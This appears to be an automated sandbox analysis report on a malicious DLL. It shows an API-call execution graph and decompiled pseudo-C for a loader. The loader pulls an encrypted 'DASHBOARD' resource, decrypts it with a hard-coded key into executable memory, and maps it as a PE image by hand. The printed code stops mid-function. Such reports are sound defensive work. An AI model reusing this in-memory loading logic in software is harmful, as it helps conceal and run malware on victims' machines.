                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: d4265234f27b2d11aa2ae59e9c74a3e25ba04503a5aaeceeed933945190559a3
                                                                                                                          • Instruction ID: 3bc167ab8d1424e9bf524d67f183f1d59960fa2547efb783356026afd6b50c53
                                                                                                                          • Opcode Fuzzy Hash: d4265234f27b2d11aa2ae59e9c74a3e25ba04503a5aaeceeed933945190559a3
                                                                                                                          • Instruction Fuzzy Hash: 5531B2A255E7C14FC7039B349D6A6947F709F57210B1A46EBC184CF0B3E6285A1DC72A
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:16.1%
                                                                                                                          Dynamic/Decrypted Code Coverage:16.2%
                                                                                                                          Signature Coverage:21.9%
                                                                                                                          Total number of Nodes:297
                                                                                                                          Total number of Limit Nodes:23
                                                                                                                          execution_graph 31847 10035042 TlsGetValue 31848 10035076 GetModuleHandleA 31847->31848 31849 10035055 31847->31849 31850 10035085 GetProcAddress 31848->31850 31851 1003509f 31848->31851 31849->31848 31852 1003505f TlsGetValue 31849->31852 31853 1003506e 31850->31853 31855 1003506a 31852->31855 31853->31851 31854 10035095 RtlEncodePointer 31853->31854 31854->31851 31855->31848 31855->31853 31856 10020c26 31857 10020c32 __EH_prolog3 31856->31857 31859 10020c80 31857->31859 31867 1002083b EnterCriticalSection 31857->31867 31881 100201f1 RaiseException __CxxThrowException@8 31857->31881 31882 1002094b TlsAlloc InitializeCriticalSection 31857->31882 31883 100206c8 EnterCriticalSection TlsGetValue LeaveCriticalSection LeaveCriticalSection 31859->31883 31862 10020c8d 31864 10020c93 31862->31864 31865 10020ca6 ~_Task_impl 31862->31865 31884 100209ed 88 API calls 4 library calls 31864->31884 31872 1002085a 31867->31872 31868 10020916 _memset 31869 1002092a LeaveCriticalSection 31868->31869 31869->31857 31870 10020893 31885 10014460 31870->31885 31871 100208a8 GlobalHandle GlobalUnlock 31874 10014460 ctype 80 API calls 31871->31874 31872->31868 31872->31870 31872->31871 31876 100208c5 GlobalReAlloc 31874->31876 31877 100208cf 31876->31877 31878 100208f7 GlobalLock 31877->31878 31879 100208da GlobalHandle GlobalLock 31877->31879 31880 100208e8 LeaveCriticalSection 31877->31880 31878->31868 31879->31880 31880->31878 31882->31857 31883->31862 31884->31865 31886 10014477 ctype 31885->31886 31887 1001448c GlobalAlloc 31886->31887 31889 10013ba0 80 API calls ctype 31886->31889 31887->31877 31889->31887 31890 10030d06 31891 10030d12 31890->31891 31892 10030d0d 31890->31892 31896 10030c10 31891->31896 31908 1003906d GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 31892->31908 31895 10030d23 31898 10030c1c __setmbcp 31896->31898 31897 10030c69 31906 10030cb9 __setmbcp 31897->31906 31963 100125c0 31897->31963 31898->31897 31898->31906 31909 10030a37 31898->31909 31902 10030c99 31904 10030a37 __CRT_INIT@12 165 API calls 31902->31904 31902->31906 31903 100125c0 ___DllMainCRTStartup 146 API calls 31905 10030c90 31903->31905 31904->31906 31907 10030a37 __CRT_INIT@12 165 API calls 31905->31907 31906->31895 31907->31902 31908->31891 31910 10030b61 31909->31910 31911 10030a4a GetProcessHeap HeapAlloc 31909->31911 31912 10030b67 31910->31912 31913 10030b9c 31910->31913 31914 10030a67 31911->31914 31915 10030a6e GetVersionExA 31911->31915 31912->31914 31922 10030b86 31912->31922 32011 100310be 67 API calls _doexit 31912->32011 31918 10030ba1 31913->31918 31919 10030bfa 31913->31919 31914->31897 31916 10030a89 GetProcessHeap HeapFree 31915->31916 31917 10030a7e GetProcessHeap HeapFree 31915->31917 31920 10030ab5 31916->31920 31917->31914 31995 10035135 6 API calls __decode_pointer 31918->31995 31919->31914 32030 10035425 79 API calls 2 library calls 31919->32030 31985 10036624 HeapCreate 31920->31985 31922->31914 32012 100389ee 68 API calls __setmbcp 31922->32012 31923 10030ba6 31996 10035840 31923->31996 31928 10030aeb 31928->31914 31931 10030af4 31928->31931 32002 1003548e 78 API calls 6 library calls 31931->32002 31932 10030b90 32013 10035178 70 API calls 2 library calls 31932->32013 31933 10030bbe 32015 100350ae TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress 31933->32015 31937 10030af9 __RTC_Initialize 31940 10030afd 31937->31940 31943 10030b0c GetCommandLineA 31937->31943 31938 10030b95 32014 1003667e VirtualFree HeapFree HeapFree HeapDestroy 31938->32014 31939 10030bd0 31945 10030bd7 31939->31945 31946 10030bee 31939->31946 32003 1003667e VirtualFree HeapFree HeapFree HeapDestroy 31940->32003 32004 10038d66 77 API calls 3 library calls 31943->32004 32016 100351b5 67 API calls 4 library calls 31945->32016 32017 1002fa69 31946->32017 31948 10030b1c 32005 100387ae 72 API calls 3 library calls 31948->32005 31951 10030bde GetCurrentThreadId 31951->31914 31952 10030b26 31953 10030b2a 31952->31953 32007 10038cad 111 API calls 3 library calls 31952->32007 32006 10035178 70 API calls 2 library calls 31953->32006 31956 10030b36 31957 10030b4a 31956->31957 32008 10038a3a 110 API calls 6 library calls 31956->32008 31962 10030b02 31957->31962 32010 100389ee 68 API calls __setmbcp 31957->32010 31960 10030b3f 31960->31957 32009 10030f4d 75 API calls 3 library calls 31960->32009 31962->31914 32056 10006a90 31963->32056 31966 1001265a 32090 1002fe65 105 API calls 6 library calls 31966->32090 31967 1001261c FindResourceW LoadResource SizeofResource 31970 10006a90 ___DllMainCRTStartup 67 API calls 31967->31970 31971 10012744 ___DllMainCRTStartup 31970->31971 31974 100127b7 VirtualAlloc 31971->31974 31975 1001279b VirtualAllocExNuma 31971->31975 31973 1001284d 31973->31902 31973->31903 31976 100127da 31974->31976 31975->31976 32061 1002fb00 31976->32061 31980 100127fa 32084 10002970 31980->32084 31982 10012810 ___DllMainCRTStartup 32087 100026a0 31982->32087 31984 10012664 32091 1002f81e 5 API calls __invoke_watson 31984->32091 31986 10036647 31985->31986 31987 10036644 31985->31987 32031 100365c9 67 API calls 2 library calls 31986->32031 31987->31928 31989 1003664c 31990 10036656 31989->31990 31991 1003667a 31989->31991 32032 10035aca HeapAlloc 31990->32032 31991->31928 31993 10036660 31993->31991 31994 10036665 HeapDestroy 31993->31994 31994->31987 31995->31923 31999 10035844 31996->31999 31998 10030bb2 31998->31914 31998->31933 31999->31998 32000 10035864 Sleep 31999->32000 32033 10030678 31999->32033 32001 10035879 32000->32001 32001->31998 32001->31999 32002->31937 32003->31962 32004->31948 32005->31952 32006->31940 32007->31956 32008->31960 32009->31957 32010->31953 32011->31922 32012->31932 32013->31938 32014->31914 32015->31939 32016->31951 32019 1002fa75 __setmbcp 32017->32019 32018 1002faee _realloc __setmbcp 32018->31962 32019->32018 32029 1002fab4 32019->32029 32052 10035a99 67 API calls 2 library calls 32019->32052 32020 1002fac9 HeapFree 32020->32018 32022 1002fadb 32020->32022 32055 100311f4 67 API calls __getptd_noexit 32022->32055 32024 1002fae0 GetLastError 32024->32018 32025 1002faa6 32054 1002fabf LeaveCriticalSection _doexit 32025->32054 32026 1002fa8c ___sbh_find_block 32026->32025 32053 10035b3d VirtualFree VirtualFree HeapFree ___BuildCatchObjectHelper 32026->32053 32029->32018 32029->32020 32030->31914 32031->31989 32032->31993 32034 10030684 __setmbcp 32033->32034 32035 100306bb _memset 32034->32035 32036 1003069c 32034->32036 32040 1003072d RtlAllocateHeap 32035->32040 32041 100306b1 __setmbcp 32035->32041 32048 10035a99 67 API calls 2 library calls 32035->32048 32049 100362e6 5 API calls 2 library calls 32035->32049 32050 10030774 LeaveCriticalSection _doexit 32035->32050 32051 100368d5 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 32035->32051 32046 100311f4 67 API calls __getptd_noexit 32036->32046 32038 100306a1 32047 10037753 4 API calls 2 library calls 32038->32047 32040->32035 32041->31999 32046->32038 32048->32035 32049->32035 32050->32035 32051->32035 32052->32026 32053->32025 32054->32029 32055->32024 32057 1002f9a6 _malloc 67 API calls 32056->32057 32058 10006aa1 32057->32058 32059 1002fa69 __setmbcp 67 API calls 32058->32059 32060 10006aad 32058->32060 32059->32060 32060->31966 32060->31967 32062 1002fb18 32061->32062 32063 1002fb3f __VEC_memcpy 32062->32063 32064 100127eb 32062->32064 32063->32064 32065 1002f9a6 32064->32065 32066 1002fa53 32065->32066 32077 1002f9b4 32065->32077 32099 100368d5 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 32066->32099 32068 1002fa59 32100 100311f4 67 API calls __getptd_noexit 32068->32100 32071 1002fa5f 32071->31980 32074 1002fa17 RtlAllocateHeap 32074->32077 32075 1002f9c9 32075->32077 32092 10036892 67 API calls __NMSG_WRITE 32075->32092 32093 100366f2 67 API calls 6 library calls 32075->32093 32094 10030e7b GetModuleHandleA GetProcAddress ExitProcess ___crtCorExitProcess 32075->32094 32077->32074 32077->32075 32078 1002fa3e 32077->32078 32081 1002fa3c 32077->32081 32083 1002fa4a 32077->32083 32095 1002f957 67 API calls 4 library calls 32077->32095 32096 100368d5 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 32077->32096 32097 100311f4 67 API calls __getptd_noexit 32078->32097 32098 100311f4 67 API calls __getptd_noexit 32081->32098 32083->31980 32085 1002f9a6 _malloc 67 API calls 32084->32085 32086 10002990 32085->32086 32086->31982 32101 10002280 32087->32101 32090->31984 32091->31973 32092->32075 32093->32075 32095->32077 32096->32077 32097->32081 32098->32083 32099->32068 32100->32071 32138 10001990 32101->32138 32104 100022c3 SetLastError 32135 100022a9 32104->32135 32105 100022d5 32106 10001990 ___DllMainCRTStartup SetLastError 32105->32106 32107 100022ee 32106->32107 32108 10002310 SetLastError 32107->32108 32109 10002322 32107->32109 32107->32135 32108->32135 32110 10002331 SetLastError 32109->32110 32111 10002343 32109->32111 32110->32135 32112 1000234e SetLastError 32111->32112 32114 10002360 GetNativeSystemInfo 32111->32114 32112->32135 32115 10002414 SetLastError 32114->32115 32116 10002426 VirtualAlloc 32114->32116 32115->32135 32117 10002472 GetProcessHeap HeapAlloc 32116->32117 32118 10002447 VirtualAlloc 32116->32118 32120 100024ac 32117->32120 32121 1000248c VirtualFree SetLastError 32117->32121 32118->32117 32119 10002463 SetLastError 32118->32119 32119->32135 32122 10001990 ___DllMainCRTStartup SetLastError 32120->32122 32121->32135 32123 1000250e 32122->32123 32124 10002512 32123->32124 32125 1000251c VirtualAlloc 32123->32125 32176 10002840 VirtualFree VirtualFree GetProcessHeap HeapFree ___DllMainCRTStartup 32124->32176 32126 1000254b ___DllMainCRTStartup 32125->32126 32141 100019c0 32126->32141 32129 1000257f ___DllMainCRTStartup 32129->32124 32151 10001ff0 32129->32151 32133 100025e8 ___DllMainCRTStartup 32133->32124 32133->32135 32170 79e991 32133->32170 32135->31984 32136 1000264f SetLastError 32136->32124 32139 100019ab 32138->32139 32140 1000199f SetLastError 32138->32140 32139->32104 32139->32105 32139->32135 32140->32139 32144 100019f0 32141->32144 32142 10001a83 32145 10001990 ___DllMainCRTStartup SetLastError 32142->32145 32143 10001a2c VirtualAlloc 32146 10001a50 32143->32146 32147 10001a57 ___DllMainCRTStartup 32143->32147 32144->32142 32144->32143 32150 10001aa0 ___DllMainCRTStartup 32144->32150 32148 10001a9c 32145->32148 32146->32150 32147->32144 32149 10001aa4 VirtualAlloc 32148->32149 32148->32150 32149->32150 32150->32129 32152 10002029 IsBadReadPtr 32151->32152 32161 1000201f 32151->32161 32154 10002053 32152->32154 32152->32161 32155 10002085 SetLastError 32154->32155 32156 10002099 32154->32156 32154->32161 32155->32161 32177 100018b0 VirtualQuery VirtualFree VirtualAlloc ___DllMainCRTStartup 32156->32177 32158 100020b3 32159 100020bf SetLastError 32158->32159 32163 100020e9 32158->32163 32159->32161 32161->32124 32164 10001cb0 32161->32164 32162 100021f9 SetLastError 32162->32161 32163->32161 32163->32162 32168 10001cf8 ___DllMainCRTStartup 32164->32168 32165 10001e01 32166 10001b80 ___DllMainCRTStartup 2 API calls 32165->32166 32169 10001ddd 32166->32169 32168->32165 32168->32169 32178 10001b80 32168->32178 32169->32133 32171 79ea62 32170->32171 32175 79ea8d 32170->32175 32185 79f8fd 32171->32185 32175->32135 32175->32136 32176->32135 32177->32158 32179 10001b9c 32178->32179 32181 10001b92 32178->32181 32180 10001baa 32179->32180 32183 10001c04 VirtualProtect 32179->32183 32180->32181 32184 10001be2 VirtualFree 32180->32184 32181->32168 32183->32181 32184->32181 32196 79fde0 32185->32196 32187 79ffd1 32209 79ab87 32187->32209 32189 79ea75 32189->32175 32198 7993ed 32189->32198 32194 7adcf7 GetPEB 32194->32196 32195 79a8b0 GetPEB 32195->32196 32196->32187 32196->32189 32196->32194 32196->32195 32201 79b23c 32196->32201 32205 7a46bb 32196->32205 32219 7ada22 GetPEB 32196->32219 32220 7947ce GetPEB 32196->32220 32221 79f899 GetPEB 32196->32221 32222 794b61 32196->32222 32199 7aaa30 GetPEB 32198->32199 32200 799456 ExitProcess 32199->32200 32200->32175 32202 79b254 32201->32202 32226 7aaa30 32202->32226 32206 7a46da 32205->32206 32207 7aaa30 GetPEB 32206->32207 32208 7a4729 SHGetFolderPathW 32207->32208 32208->32196 32210 79abb0 32209->32210 32211 794b61 GetPEB 32210->32211 32212 79ad67 32211->32212 32234 797f5d 32212->32234 32214 79ad99 32215 79ada4 32214->32215 32238 7a1e67 GetPEB 32214->32238 32215->32189 32217 79adc4 32239 7a1e67 GetPEB 32217->32239 32219->32196 32220->32196 32221->32196 32223 794b74 32222->32223 32240 791ea7 32223->32240 32227 7aab1d 32226->32227 32228 79b2b8 lstrcmpiW 32226->32228 32232 7a0a0e GetPEB 32227->32232 32228->32196 32230 7aab33 32233 79cdcd GetPEB 32230->32233 32232->32230 32233->32228 32235 797f8e 32234->32235 32236 7aaa30 GetPEB 32235->32236 32237 797fd4 CreateProcessW 32236->32237 32237->32214 32238->32217 32239->32215 32241 791ebc 32240->32241 32244 79702c 32241->32244 32245 797049 32244->32245 32246 7aaa30 GetPEB 32245->32246 32247 791f4c 32246->32247 32247->32196

                                                                                                                          Executed Functions

                                                                                                                          Function 100125C0 Relevance: 45.7, APIs: 7, Strings: 19, Instructions: 165memoryCOMMONLIBRARYCODE
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          C-Code - Quality: 89%
                                                                                                                          			E100125C0(void* __ebx, void* __edi, void* __esi, void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _v8;
				void* _v12;
				intOrPtr _v16;
				signed int _v20;
				short _v22;
				short _v24;
				short _v26;
				short _v28;
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				short _v38;
				char _v40;
				void* _v44;
				void* _v48;
				long _v52;
				void* _v56;
				struct HRSRC__* _v60;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				short _v72;
				short _v74;
				short _v76;
				short _v78;
				short _v80;
				short _v82;
				short _v84;
				short _v86;
				char _v88;
				intOrPtr _v92;
				void* __ebp;
				signed int _t66;
				void* _t70;
				void* _t72;
				struct HRSRC__* _t74;
				void* _t78;
				intOrPtr _t92;
				void* _t93;
				void* _t95;
				intOrPtr _t104;
				signed int _t120;
				void* _t121;

				_t119 = __esi;
				_t118 = __edi;
				_t96 = __ebx;
				_t66 =  *0x100545cc; // 0x986eb69
				_v20 = _t66 ^ _t120;
				_v92 = _a8;
				 *0x10055a80 = _a4;
				_t109 = _a8;
				 *0x10055a84 = _a8;
				 *0x10055a88 = _a12;
				_v8 = 0;
				_v52 = 0;
				_v44 = 0;
				_v48 = 0;
				_v12 = 0;
				_t70 = E10006A90(__eflags); // executed
				_t131 = _t70;
				if(_t70 != 0) {
					_push(0x10046758);
					E1002FE65(__ebx, _t109, __edi, __esi, __eflags);
					_t72 = 0;
				} else {
					 *0x100530b8 = 0;
					 *0x100530bc = 0;
					 *0x100530c0 = 0;
					 *0x100530c8 = 0;
					 *0x100530c4 = 0;
					 *0x100530cc = 0;
					_v60 = 0;
					_v56 = 0;
					_t74 = FindResourceW(_a4, 0x1705, L"DASHBOARD"); // executed
					_v60 = _t74;
					_v56 = LoadResource(_a4, _v60);
					_v52 = SizeofResource(_a4, _v60);
					_v88 = 0x6b;
					_v86 = 0x65;
					_v84 = 0x72;
					_v82 = 0x6e;
					_v80 = 0x65;
					_v78 = 0x6c;
					_v76 = 0x33;
					_v74 = 0x32;
					_v72 = 0x2e;
					_v70 = 0x64;
					_v68 = 0x6c;
					_v66 = 0x6c;
					_v64 = 0;
					_v40 = 0x6e;
					_v38 = 0x74;
					_v36 = 0x64;
					_v34 = 0x6c;
					_v32 = 0x6c;
					_v30 = 0x2e;
					_v28 = 0x64;
					_v26 = 0x6c;
					_v24 = 0x6c;
					_v22 = 0;
					_t78 = E10006A90(_t131); // executed
					if(_t78 == 0) {
						_t45 =  &_v88; // 0x6b
						_t95 = E100048E0(_t45);
						_t121 = _t121 + 4;
						_v44 = _t95;
					}
					_t47 =  &_v40; // 0x6e
					_v48 = E100048E0(_t47);
					 *0x10055a7c = E100053D0(_v44, 0x6c705b40);
					 *0x10055a78 = E100053D0(_v44, 0x531ff383);
					_t133 =  *0x10055a78;
					if( *0x10055a78 == 0) {
						__eflags = 0x2000;
						_v12 = VirtualAlloc(0, _v52, 0x00002000 -  *0x100530cc | 0x00001000, 0x40);
					} else {
						_t93 =  *0x10055a78(0xffffffff, 0, _v52, 0x3000, 0x40, 0); // executed
						_v12 = _t93;
					}
					E1002FB00(_t96, _t118, _t119, _v12, _v56, _v52);
					_t104 =  *0x100530b4; // 0x2795
					_v16 = E1002F9A6(_t96, _v56, _t118, _t119, _t104);
					E10002970(_t133, _v16, "6p2Z6a6CZ&M>ZR$a@Y$xnQ?<XBeh<22mz&0", 0x24);
					_t109 = _v16;
					E10003EE0(_v16, _v12, _v52);
					_t92 = E100026A0(0x10055a64, _v12, _v52); // executed
					 *0x10055a8c = _t92;
					_t72 = 1;
				}
				return E1002F81E(_t72, _t96, _v20 ^ _t120, _t109, _t118, _t119);
			}
















































                                                                                                                          0x100125c0
                                                                                                                          0x100125c0
                                                                                                                          0x100125c0
                                                                                                                          0x100125c6
                                                                                                                          0x100125cd
                                                                                                                          0x100125d3
                                                                                                                          0x100125d9
                                                                                                                          0x100125df
                                                                                                                          0x100125e2
                                                                                                                          0x100125eb
                                                                                                                          0x100125f0
                                                                                                                          0x100125f7
                                                                                                                          0x100125fe
                                                                                                                          0x10012605
                                                                                                                          0x1001260c
                                                                                                                          0x10012613
                                                                                                                          0x10012618
                                                                                                                          0x1001261a
                                                                                                                          0x1001265a
                                                                                                                          0x1001265f
                                                                                                                          0x10012667
                                                                                                                          0x1001261c
                                                                                                                          0x1001261c
                                                                                                                          0x10012626
                                                                                                                          0x10012630
                                                                                                                          0x1001263a
                                                                                                                          0x10012644
                                                                                                                          0x1001264e
                                                                                                                          0x1001266e
                                                                                                                          0x10012675
                                                                                                                          0x1001268a
                                                                                                                          0x10012690
                                                                                                                          0x100126a1
                                                                                                                          0x100126b2
                                                                                                                          0x100126b5
                                                                                                                          0x100126bb
                                                                                                                          0x100126c1
                                                                                                                          0x100126c7
                                                                                                                          0x100126cd
                                                                                                                          0x100126d3
                                                                                                                          0x100126d9
                                                                                                                          0x100126df
                                                                                                                          0x100126e5
                                                                                                                          0x100126eb
                                                                                                                          0x100126f1
                                                                                                                          0x100126f7
                                                                                                                          0x100126fd
                                                                                                                          0x10012703
                                                                                                                          0x10012709
                                                                                                                          0x1001270f
                                                                                                                          0x10012715
                                                                                                                          0x1001271b
                                                                                                                          0x10012721
                                                                                                                          0x10012727
                                                                                                                          0x1001272d
                                                                                                                          0x10012733
                                                                                                                          0x10012739
                                                                                                                          0x1001273f
                                                                                                                          0x10012746
                                                                                                                          0x10012748
                                                                                                                          0x1001274c
                                                                                                                          0x10012751
                                                                                                                          0x10012754
                                                                                                                          0x10012754
                                                                                                                          0x10012757
                                                                                                                          0x10012763
                                                                                                                          0x10012777
                                                                                                                          0x1001278d
                                                                                                                          0x10012792
                                                                                                                          0x10012799
                                                                                                                          0x100127c4
                                                                                                                          0x100127d7
                                                                                                                          0x1001279b
                                                                                                                          0x100127ac
                                                                                                                          0x100127b2
                                                                                                                          0x100127b2
                                                                                                                          0x100127e6
                                                                                                                          0x100127ee
                                                                                                                          0x100127fd
                                                                                                                          0x1001280b
                                                                                                                          0x1001281b
                                                                                                                          0x1001281f
                                                                                                                          0x10012834
                                                                                                                          0x10012839
                                                                                                                          0x1001283e
                                                                                                                          0x1001283e
                                                                                                                          0x10012850

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 10006A90: _malloc.LIBCMT ref: 10006A9C
                                                                                                                          • _printf.LIBCMT ref: 1001265F
                                                                                                                          • FindResourceW.KERNEL32(00000000,00001705,DASHBOARD), ref: 1001268A
                                                                                                                          • LoadResource.KERNEL32(00000000,00000000), ref: 1001269B
                                                                                                                          • SizeofResource.KERNEL32(00000000,00000000), ref: 100126AC
                                                                                                                          • VirtualAllocExNuma.KERNELBASE(000000FF,00000000,00000000,00003000,00000040,00000000), ref: 100127AC
                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,-100510CC,00000040), ref: 100127D1
                                                                                                                          • _malloc.LIBCMT ref: 100127F5
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Resource$AllocVirtual_malloc$FindLoadNumaSizeof_printf
                                                                                                                          • String ID: .$.$2$3$6p2Z6a6CZ&M>ZR$a@Y$xnQ?<XBeh<22mz&0$DASHBOARD$d$d$e$kre3.l$l$l$l$l$l$l$l$n$ndldl
                                                                                                                          • API String ID: 572389289-2839844625
                                                                                                                          • Opcode ID: adac8d752e0c47dc141f46a7132d7a35c557a18b7d00a43f57a8df52d4076e8d
                                                                                                                          • Instruction ID: 8f66a7c676ce8d0fa2ca8bd8519024a549b55f77dd79b918ae70bd0eec3b217e
                                                                                                                          • Opcode Fuzzy Hash: adac8d752e0c47dc141f46a7132d7a35c557a18b7d00a43f57a8df52d4076e8d
                                                                                                                          • Instruction Fuzzy Hash: FB613EB5D10218EBEB00DFA0DC95B9EBBB5FF08344F10911CE504AB390E7B66548CB6A
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10002280 Relevance: 22.8, APIs: 15, Instructions: 331COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 36 10002280-100022a7 call 10001990 39 100022b0-100022c1 36->39 40 100022a9-100022ab 36->40 42 100022c3-100022d0 SetLastError 39->42 43 100022d5-100022f0 call 10001990 39->43 41 1000269a-1000269d 40->41 42->41 46 100022f2-100022f4 43->46 47 100022f9-1000230e 43->47 46->41 48 10002310-1000231d SetLastError 47->48 49 10002322-1000232f 47->49 48->41 50 10002331-1000233e SetLastError 49->50 51 10002343-1000234c 49->51 50->41 52 10002360-10002381 51->52 53 1000234e-1000235b SetLastError 51->53 54 10002395-1000239f 52->54 53->41 55 100023a1-100023a8 54->55 56 100023d7-10002412 GetNativeSystemInfo 54->56 57 100023b8-100023c4 55->57 58 100023aa-100023b6 55->58 59 10002414-10002421 SetLastError 56->59 60 10002426-10002445 VirtualAlloc 56->60 61 100023c7-100023cd 57->61 58->61 59->41 62 10002472-1000248a GetProcessHeap HeapAlloc 60->62 63 10002447-10002461 VirtualAlloc 60->63 64 100023d5 61->64 65 100023cf-100023d2 61->65 67 100024ac-10002510 call 10001990 62->67 68 1000248c-100024a7 VirtualFree SetLastError 62->68 63->62 66 10002463-1000246d SetLastError 63->66 64->54 65->64 66->41 72 10002512 67->72 73 1000251c-10002581 VirtualAlloc call 10001810 call 100019c0 67->73 68->41 74 1000268c-10002698 call 10002840 72->74 81 10002583 73->81 82 1000258d-1000259e 73->82 74->41 81->74 83 100025a0-100025b6 call 10001eb0 82->83 84 100025b8-100025bb 82->84 86 100025c2-100025d0 call 10001ff0 83->86 84->86 90 100025d2 86->90 91 100025dc-100025ea call 10001cb0 86->91 90->74 94 100025f6-10002604 call 10001e30 91->94 95 100025ec 91->95 98 10002606 94->98 99 1000260d-10002616 94->99 95->74 98->74 100 10002618-1000261f 99->100 101 1000267d-10002680 99->101 103 10002621-10002643 call 79e991 100->103 104 1000266a-10002678 100->104 102 10002687-1000268a 101->102 102->41 106 10002646-1000264d 103->106 105 1000267b 104->105 105->102 107 1000265e-10002668 106->107 108 1000264f-1000265a SetLastError 106->108 107->105 108->74
                                                                                                                          C-Code - Quality: 89%
                                                                                                                          			E10002280(intOrPtr __ecx, signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				void* _v8;
				void* _v12;
				signed short* _v16;
				void* _v20;
				void* _v24;
				long _v28;
				signed int _v32;
				intOrPtr _v64;
				char _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr* _v80;
				intOrPtr _v84;
				void* _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				void* _t180;
				void* _t191;
				void* _t198;
				void* _t202;
				intOrPtr _t209;
				void* _t220;
				intOrPtr _t269;
				intOrPtr _t278;
				intOrPtr _t326;

				_v100 = __ecx;
				_v72 = 0;
				_v20 = 0;
				if(E10001990(_v100, _a8, 0x40) != 0) {
					_v16 = _a4;
					if(( *_v16 & 0x0000ffff) == 0x5a4d) {
						_t10 =  &(_v16[0x1e]); // 0xfffefe57
						if(E10001990(_v100, _a8,  *_t10 + 0xf8) != 0) {
							_t15 =  &(_v16[0x1e]); // 0xfffefe57
							_v80 = _a4 +  *_t15;
							if( *_v80 == 0x4550) {
								if(( *(_v80 + 4) & 0x0000ffff) == 0x14c) {
									if(( *(_v80 + 0x38) & 0x00000001) == 0) {
										_v84 = _v80 + ( *(_v80 + 0x14) & 0x0000ffff) + 0x18;
										_v32 =  *(_v80 + 0x38);
										_v12 = 0;
										while(_v12 < ( *(_v80 + 6) & 0x0000ffff)) {
											if( *((intOrPtr*)(_v84 + 0x10)) != 0) {
												_v88 =  *((intOrPtr*)(_v84 + 0xc)) +  *((intOrPtr*)(_v84 + 0x10));
											} else {
												_v88 =  *((intOrPtr*)(_v84 + 0xc)) + _v32;
											}
											if(_v88 > _v20) {
												_v20 = _v88;
											}
											_v12 = _v12 + 1;
											_v84 = _v84 + 0x28;
										}
										__imp__GetNativeSystemInfo( &_v68); // executed
										_t59 = _v64 - 1; // 0x71
										_v28 =  *((intOrPtr*)(_v80 + 0x50)) + _t59 &  !(_v64 - 1);
										_t65 = _v64 - 1; // -1
										if(_v28 == (_v20 + _t65 &  !(_v64 - 1))) {
											_t180 = VirtualAlloc( *(_v80 + 0x34), _v28, 0x3000, 4); // executed
											_v24 = _t180;
											if(_v24 != 0) {
												L26:
												_v72 = HeapAlloc(GetProcessHeap(), 8, 0x34);
												if(_v72 != 0) {
													 *((intOrPtr*)(_v72 + 4)) = _v24;
													asm("sbb edx, edx");
													 *(_v72 + 0x14) =  ~( ~( *(_v80 + 0x16) & 0x2000));
													 *((intOrPtr*)(_v72 + 0x1c)) = _a12;
													 *((intOrPtr*)(_v72 + 0x20)) = _a16;
													 *((intOrPtr*)(_v72 + 0x24)) = _a20;
													 *((intOrPtr*)(_v72 + 0x28)) = _a24;
													 *((intOrPtr*)(_v72 + 0x30)) = _v64;
													if(E10001990(_v100, _a8,  *(_v80 + 0x54)) != 0) {
														_t191 = VirtualAlloc(_v24,  *(_v80 + 0x54), 0x1000, 4); // executed
														_v8 = _t191;
														E10001810(_v8, _v16,  *(_v80 + 0x54));
														_t115 =  &(_v16[0x1e]); // 0xfffefe57
														 *_v72 = _v8 +  *_t115;
														 *((intOrPtr*)( *_v72 + 0x34)) = _v24;
														_t198 = E100019C0(_v100, _a4, _a8, _v80, _v72); // executed
														if(_t198 != 0) {
															_t269 =  *((intOrPtr*)( *_v72 + 0x34)) -  *(_v80 + 0x34);
															_v76 = _t269;
															if(_t269 == 0) {
																 *((intOrPtr*)(_v72 + 0x18)) = 1;
															} else {
																 *((intOrPtr*)(_v72 + 0x18)) = E10001EB0(_v100, _v72, _v76);
															}
															if(E10001FF0(_v100, _v72) != 0) {
																_t202 = E10001CB0(_v100, _v72); // executed
																if(_t202 != 0) {
																	if(E10001E30(_v100, _v72) != 0) {
																		if( *((intOrPtr*)( *_v72 + 0x28)) == 0) {
																			 *(_v72 + 0x2c) = 0;
																			L49:
																			return _v72;
																		}
																		if( *(_v72 + 0x14) == 0) {
																			 *(_v72 + 0x2c) = _v24 +  *((intOrPtr*)( *_v72 + 0x28));
																			L47:
																			goto L49;
																		}
																		_v96 = _v24 +  *((intOrPtr*)( *_v72 + 0x28));
